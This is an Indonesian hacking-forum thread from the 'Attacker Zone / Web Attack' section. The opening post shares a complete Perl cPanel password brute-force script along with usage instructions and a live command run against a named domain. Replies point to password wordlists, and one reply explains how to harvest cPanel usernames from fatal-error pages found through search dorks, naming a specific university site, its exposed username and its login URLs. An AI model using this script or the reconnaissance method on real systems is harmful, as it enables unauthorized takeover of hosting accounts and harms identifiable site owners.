+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html)
+--- Thread: Cpanel Bruteforce Tool (/thread-954.html)
Cpanel Bruteforce Tool - NoseTrave - 10-19-2011
Halo Semua ! Bertemu Lagi Dengan NoseTrave Yang Paling Ganteng Se Forum! (Hah Zee? Siapatuh? Masih Gantengan Gua Kali) lol,
Kali Ini Aku Mau Share Tentang Tool Yang Satu Ini
Langsung Aja Surge Nya
PHP Code:
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
################################################## #############
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
################################################## #############
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);exit;}
headx();
$numstart = "-1";
sub headx() {
print q(
################################################## #############
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
################################################## #############
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close
";
read $sock, $answer, 128;
close($sock);
if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}
Cara Pakainya Sederhana:
PHP Code:
perl cpanel.pl [HOST] [User] [PORT] [list] [File]
-User: username Nya!
-Port Cpanelnya (Biasanya 2082)
-List: Password list Ente (Yang Belum Punya Download Di IBT ato Google)
-File: File Untuk Menempatkan Hasil
Nah Ini Contoh Live Nya:
PHP Code:
root@Anarc0de:~# perl cpanel.pl thehopebuster.us ares 2082 /root/Desktop/dictionary.txt /root/Desktop/password.txt
Sekian Dari NoseTrave!
Sangat Butuh Ijo-Ijo! (Buat Menangin Hosting)
Maaf Kalo Ada Salah Salah Kata!, Akhir Kata Terimakasih
RE: Cpanel Bruteforce Tool - guitariznoize - 10-19-2011
nice Info
RE: Cpanel Bruteforce Tool - nonot - 10-19-2011
tool buat apa ya? tlg jelasin dong om ganteng.
sekalian mo nanya tool buat bikin list password format txt/lst bisa donlot dimana ya?
#maaf aku pengguna baru banget.
RE: Cpanel Bruteforce Tool - NoseTrave - 10-19-2011
sama Sama
(10-19-2011, 11:48 AM)nonot Wrote: tool buat apa ya? tlg jelasin dong om ganteng.
sekalian mo nanya tool buat bikin list password format txt/lst bisa donlot dimana ya?
#maaf aku pengguna baru banget.
Buat Menyerang Password Cpanel Dengan Metoda Bruteforce
untuk passlist lihat dimari
http://forum.indonesianbacktrack.or.id/showthread.php?tid=581
RE: Cpanel Bruteforce Tool - betefive - 10-19-2011
ga bsa buka link nya om... bisa attach yg baru?
RE: Cpanel Bruteforce Tool - THJC - 10-19-2011
(10-19-2011, 01:56 PM)betefive Wrote: ga bsa buka link nya om... bisa attach yg baru?
Link? link yang mana om?
Wordlist?
http://www.indonesianbacktrack.or.id/?p=477
RE: Cpanel Bruteforce Tool - koecroet - 10-19-2011
cara tau usernya dari mana om??
RE: Cpanel Bruteforce Tool - NoseTrave - 10-19-2011
(10-19-2011, 08:00 PM)koecroet Wrote: cara tau usernya dari mana om??
Tanya Aja Sama Adminnya wkokwowkow
Saya juga Ngak Tahu.
RE: Cpanel Bruteforce Tool - koecroet - 10-23-2011
(10-19-2011, 09:21 PM)NoseTrave Wrote:(10-19-2011, 08:00 PM)koecroet Wrote: cara tau usernya dari mana om??
Tanya Aja Sama Adminnya wkokwowkow
Saya juga Ngak Tahu.
parah gk tanggung jawab
RE: Cpanel Bruteforce Tool - guitariznoize - 10-23-2011
(10-19-2011, 08:00 PM)koecroet Wrote: cara tau usernya dari mana om??
untuk mengetahui username dari cpanel
biasanya dari halaman yang ada fatal errornya...
disitu bisa kliatan nama direktori kadang jga username cpanel klo web tersebut memakai cpanel...
contoh cara mencari Fatal error bisa dengan berbagai teknik
dengan dork di google : Dorknya
hasilnya ada beberapa
misalkan ini :
http://www.ppsuinsgdbdg.ac.id/wp-includes/wp-db.php
Code:
Fatal error: Call to undefined function wp_die() in /home/yudwebid/public_html/ppsuinsgdbdg.ac.id/wp-includes/wp-db.php on line 1039liat nama direktori sesudah direktori "home"
itu nama usernamenya : "yudwebid"
login cpanelnya ya di sini : http://www.ppsuinsgdbdg.ac.id/cpanel atau http://www.ppsuinsgdbdg.ac.id:2082
kira" sih seperti menurut sepengetahuan saya....
jadi nama direktori yang terlihat adalah nama username yang di pakai login...
tapi ga tau jga kemungkinan nama direktori bukan nama username untuk login..